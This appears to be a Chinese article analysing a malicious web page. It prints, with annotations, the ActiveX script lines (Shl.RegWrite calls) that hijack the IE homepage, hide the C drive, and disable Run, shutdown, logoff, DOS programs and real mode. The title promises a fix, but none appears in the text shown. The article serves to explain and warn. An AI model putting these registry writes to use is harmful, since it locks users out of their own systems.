浏览网页注册表被修改之迷及解决办法

1.修改开始菜单

　　1）禁止“关闭系统”
　　2）禁止“运行”
　　3）禁止“注销”

　　2.隐藏C盘——你的C盘找不到了

　　3.禁止使用注册表编辑器regedit

　　4.禁止使用DOS程序

　　5.使系统无法进入“实模式”

　　6.禁止运行任何程序

　　7.将IE浏览器的首页改为http://www.某某.com/，收藏夹中也被加入该网址。

　　那么这些功能恐怖的功能是如何实现的呢？原来，该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害，我查看了其源代码，将其主要部分列了出来，并加了详细的注释（文中有“注”字的部分是我加的注释）。

注：下面代码是将你的IE默认连接首页改为http://www.某某.com/

Shl.RegWrite （"HKCU\Software\Microsoft\Internet Explorer\Main\
Start Page", "http://www.某某.com/"）;

注：以下是该网页修改受害者的注册表项所用的招数

Shl.RegWrite （"HKCU\Software\Microsoft\Windows\CurrentVersion
\Policies\Explorer\NoRun", 01, "REG_BINARY"）;
注：使受害者系统没有“运行”项，这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。

Shl.RegWrite （"HKCU\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoClose", 01, "REG_BINARY"）;
注：使受害者系统没有“关闭系统”项

Shl.RegWrite （"HKCU\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoLogOff", 01, "REG_BINARY"）;
注：使受害者系统没有“注销”项

Shl.RegWrite （"HKCU\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoDrives", "00000004", "REG_DWORD"）;
注：使受害者系统没有逻辑驱动器C

Shl.RegWrite （"HKCU\Software\Microsoft\Windows\CurrentVersion\
Policies\WinOldApp\ Disabled","REG_BINARY"）;
注：禁止运行所有的DOS应用程序；

Shl.RegWrite （"HKCU\Software\Microsoft\Windows\CurrentVersion\
Policies\ \WinOldApp\NoRealMode","REG_BINARY"）;
注：使系统不能启动到“实模式”（传统的DOS模式）下；

又注：进入该网页，它还会修改以下的注册表项，使WINDOWS系统登录时显示一个登录窗口（在MicroSoft网络用户登录之前）

Shl.RegWrite （"HKLM\Software\Microsoft\Windows\CurrentVersion\
Winlogon\LegalNoticeCaption", "呜啦啦..."）;
注：这些代码会使窗口的标题是“呜啦啦…”

Shl.RegWrite （"HKLM\Software\Microsoft\Windows\CurrentVersion\
Winlogon\LegalNoticeText","哈哈哈哈");

注：这个是窗口中文本的内容：“哈哈哈哈”